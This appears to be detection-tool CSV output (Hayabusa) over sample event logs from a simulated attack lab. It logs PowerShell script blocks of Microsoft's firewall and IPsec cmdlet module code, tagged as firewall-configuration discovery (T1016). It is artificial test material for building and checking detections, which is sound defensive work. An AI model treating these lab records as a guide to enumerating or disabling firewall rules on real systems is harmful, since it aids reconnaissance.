[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdle",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"tization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<?xml version='1.0' encoding='utf-8'?> <PowerShellMetadata xmlns=""http://schemas.microsoft.com/cmdlets-over-objects/2009/11""> <Class ClassName=""root/standardcimv2/MSFT_NetConSecRule"" ClassVersion=""1.0.0""> <Version>1.0.0.0</Version> <DefaultNoun>NetIPsecRule</DefaultNoun> <InstanceCmdlets> <GetCmdletParameters DefaultCmdletParameterSet=""GetAll""> <QueryableProperties> <Property PropertyName=""InstanceID""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""IPsecRuleName"" ValueFromPipelineByPropertyName=""true"" CmdletParameterSets=""ByIPsecRuleName"" IsMandatory=""true"" Position=""0"" Aliases=""ID Name""/> </RegularQuery> </Property> <Property PropertyName=""DisplayName""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByDisplayName"" IsMandatory=""true""/> </RegularQuery> </Property> <Property PropertyName=""Description""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""DisplayGroup""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""RuleGroup""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""Group"" CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""Enabled""> <Type PSType=""NetSecurity.Enabled""/> <RegularQuery> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""Mode""> <Type PSType=""NetSecurity.IPsecMode""/> <RegularQuery> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""InboundSecurity""> <Type PSType=""NetSecurity.SecurityPolicy""/> <RegularQuery> <CmdletParameterMetadata CmdletParameterSets=""ByQuery"" Aliases=""SecIn""/> </RegularQuery> </Property> <Property PropertyName=""OutboundSecurity""> <Type PSType=""NetSecurity.SecurityPolicy""/> <RegularQuery> <CmdletParameterMetadata CmdletParameterSets=""ByQuery"" Aliases=""SecOut""/> </RegularQuery> </Property> <Property PropertyName=""QuickModeCryptoSet""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""Phase1AuthSet""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""Phase2AuthSet""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""KeyModule""> <Type PSType=""NetSecurity.KeyModule""/> <RegularQuery> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""AllowWatchKey""> <Type PSType=""boolean""/> <RegularQuery> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""AllowSetKey""> <Type PSType=""boolean""/> <RegularQuery> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""RemoteTunnelEndpointDNSName""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""RemoteTunnelHostname"" CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""MaxReturnPathLifetimeSeconds""> <Type PSType=""uint32""/> <RegularQuery> <CmdletParameterMetadata PSName=""ForwardPathLifetime"" CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""BypassTunnelIfEncrypted""> <Type PSType=""boolean""/> <RegularQuery> <CmdletParameterMetadata PSName=""EncryptedTunnelBypass"" CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""RequireAuthorization""> <Type PSType=""boolean""/> <RegularQuery> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""Users""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""User"" CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""Machines""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""Machine"" CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""PrimaryStatus""> <Type PSType=""NetSecurity.PrimaryStatus""/> <RegularQuery> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""Status""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""PolicyStoreSource""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""PolicyStoreSourceType""> <Type PSType=""NetSecurity.PolicyStoreType""/> <RegularQuery> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> </QueryableProperties> <QueryableAssociations> <Association Association=""MSFT_NetConSecRuleFilterByAddress"" ResultRole=""GroupComponent"" SourceRole=""PartComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter""/> <CmdletParameterMetadata PSName=""AssociatedNetFirewallAddressFilter"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetFirewallAddressFilter""/> </AssociatedInstance> </Association> <Association Association=""MSFT_NetConSecRuleFilterByInterface"" ResultRole=""GroupComponent"" SourceRole=""PartComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter""/> <CmdletParameterMetadata PSName=""AssociatedNetFirewallInterfaceFilter"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetFirewallInterfaceFilter""/> </AssociatedInstance> </Association> <Association Association=""MSFT_NetConSecRuleFilterByInterfaceType"" ResultRole=""GroupComponent"" SourceRole=""PartComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter""/> <CmdletParameterMetadata PSName=""AssociatedNetFirewallInterfaceTypeFilter"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetFirewallInterfaceTypeFilter""/> </AssociatedInstance> </Association> <Association Association=""MSFT_NetConSecRuleFilterByProtocolPort"" ResultRole=""GroupComponent"" SourceRole=""PartComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter""/> <CmdletParameterMetadata PSName=""AssociatedNetFirewallPortFilter"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetFirewallPortFilter""/> </AssociatedInstance> </Association> <Association Association=""MSFT_NetConSecRuleInProfile"" ResultRole=""PartComponent"" SourceRole=""GroupComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile""/> <CmdletParameterMetadata PSName=""AssociatedNetFirewallProfile"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetFirewallProfile""/> </AssociatedInstance> </Association> <Association Association=""MSFT_NetConSecRuleEMAuthSet"" ResultRole=""GroupComponent"" SourceRole=""PartComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet""/> <CmdletParameterMetadata PSName=""AssociatedNetIPsecPhase2AuthSet"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetIPsecPhase2AuthSet""/> </AssociatedInstance> </Association> <Association Association=""MSFT_NetConSecRuleMMAuthSet"" ResultRole=""GroupComponent"" SourceRole=""PartComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet""/> <CmdletParameterMetadata PSName=""AssociatedNetIPsecPhase1AuthSet"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetIPsecPhase1AuthSet""/> </AssociatedInstance> </Association> <Association Association=""MSFT_NetConSecRuleQMCryptoSet"" ResultRole=""GroupComponent"" SourceRole=""PartComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet""/> <CmdletParameterMetadata PSName=""AssociatedNetIPsecQuickModeCryptoSet"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetIPsecQuickModeCryptoSet""/> </AssociatedInstance> </Association> </QueryableAssociations> <QueryOptions> <Option OptionName=""All""> <Type PSType=""System.Management.Automation.SwitchParameter""/> <CmdletParameterMetadata CmdletParameterSets=""GetAll""/> </Option> <Option OptionName=""PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""TracePolicyStore"">",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
